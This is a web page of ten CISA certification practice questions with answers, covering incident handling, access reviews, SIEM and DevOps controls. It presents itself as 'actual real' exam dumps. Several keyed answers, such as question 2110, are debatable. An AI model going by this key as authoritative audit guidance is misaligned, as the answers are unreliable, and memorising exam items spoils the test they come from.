Skip to Content

ISACA CISA Certified Information Systems Auditor Exam Questions and Answers – 20

The latest ISACA CISA (Certified Information Systems Auditor) certification actual real practice exam question and answer (Q&A) dumps are available free, which are helpful for you to pass the ISACA CISA exam and earn ISACA CISA certification.

ISACA Certified Information Systems Auditor (CISA) Exam Questions and Answers

CISA Question 2101

Question

Which of the following incident management practices would BEST facilitate rapid resolution and reduce downtime from unplanned interruptions?

A. Ensuring the service desk has access to catalogs of known errors
B. Ensuring IT systems are monitored on a continual basis
C. Ensuring incidents with unknown root causes are escalated
D. Ensuring the service desk is trained on issue resolution

Answer

B. Ensuring IT systems are monitored on a continual basis

CISA Question 2102

Question

After an employee termination, a network account was removed, but the application account remained active. To keep this issue from recurring, which of the following is the BEST recommendation?

A. Integrate application accounts with network single sign-on.
B. Perform periodic access reviews.
C. Leverage shared accounts for the application.
D. Retrain system administration staff.

Answer

A. Integrate application accounts with network single sign-on.

CISA Question 2103

Question

Which of the following is the BEST way to mitigate the risk associated with a document storage application that has a syncing feature that could allow malware to spread to other machines in the network?

A. An audit should be conducted to detect shadow data and shadow IT in the network.
B. User behavior modeling and analysis should be performed to discover anomalies in user behavior.
C. Content inspection technologies should be used to scan files for sensitive data.
D. All files should be scanned when they are uploaded to and downloaded from the application.

Answer

D. All files should be scanned when they are uploaded to and downloaded from the application.

CISA Question 2104

Question

Which of the following is an example of a corrective control?

A. Restoring system information from data backups
B. Utilizing processes that enforce segregation of duties
C. Generating automated batch job failure notifications
D. Employing only qualified personnel to execute tasks

Answer

A. Restoring system information from data backups

CISA Question 2105

Question

Which of the following is the BEST indication that an organization’s security incident and event monitoring (SIEM) capability is operating effectively?

A. Security event logging is centralized.
B. Security event logging policies are defined.
C. Security event logging is enabled for individual applications.
D. Security event logging is correlated across multiple applications.

Answer

D. Security event logging is correlated across multiple applications.

CISA Question 2106

Question

Which of the following observations should be of MOST concern to an IS auditor evaluating an IT security team’s incident handling practices?

A. The team’s scope covers any nonstandard operation of IT services within the organization.
B. The prioritization of incidents is not done through a standardized process.
C. Defined acceptable ranges for incident resolution are not established.
D. Unresolved incidents are escalated based on criteria set by the organization’s CIO.

Answer

C. Defined acceptable ranges for incident resolution are not established.

CISA Question 2107

Question

An IT department is unaware of spreadsheets and databases that have been created by business end users to support their respective operations.
Which of the following is the GREATEST risk in this situation?

A. End-user solutions may not have proper documentation.
B. End-user developed systems may duplicate data.
C. End-user solutions may not be protected by IT general controls.
D. End-user developed systems may be inefficient.

Answer

C. End-user solutions may not be protected by IT general controls.

CISA Question 2108

Question

Using development and operations (DevOps) processes, an organization’s IT department has automated the process of replacing application programming interfaces (APIs) in production with new versions. Which of the following controls would BEST reduce the risk of vulnerabilities in this situations?

A. Review API change requests to ensure appropriate authorization exists
B. Conduct API security testing prior to release into production
C. Examine API log files to determine when changes occur in production
D. Review an up-to-date inventory of APIs in production for completeness

Answer

B. Conduct API security testing prior to release into production

CISA Question 2109

Question

An IS audit of help desk operations reveals that a number of similar issues have recently been reported to the help desk, but incident details have not been tracked. Which of the following is the MOST significant risk in this situation?

A. The help desk may not be meeting agreed-upon service levels.
B. The help desk may not be able to perform root cause analysis.
C. The help desk may lack resources to investigate incidents.
D. The help desk may not respond to incidents in a timely manner.

Answer

B. The help desk may not be able to perform root cause analysis.

CISA Question 2110

Question

An IS auditor notes that several recent incidents related to server overload were not anticipated early enough by IT operations to prevent outages.
Which of the following is the auditor’s BEST recommendation?

A. Update the IT operations balanced scorecard.
B. Improve training for IT operations personnel.
C. Re-evaluate key performance indicators (KPIs).
D. Purchase additional server hardware.

Answer

A. Update the IT operations balanced scorecard.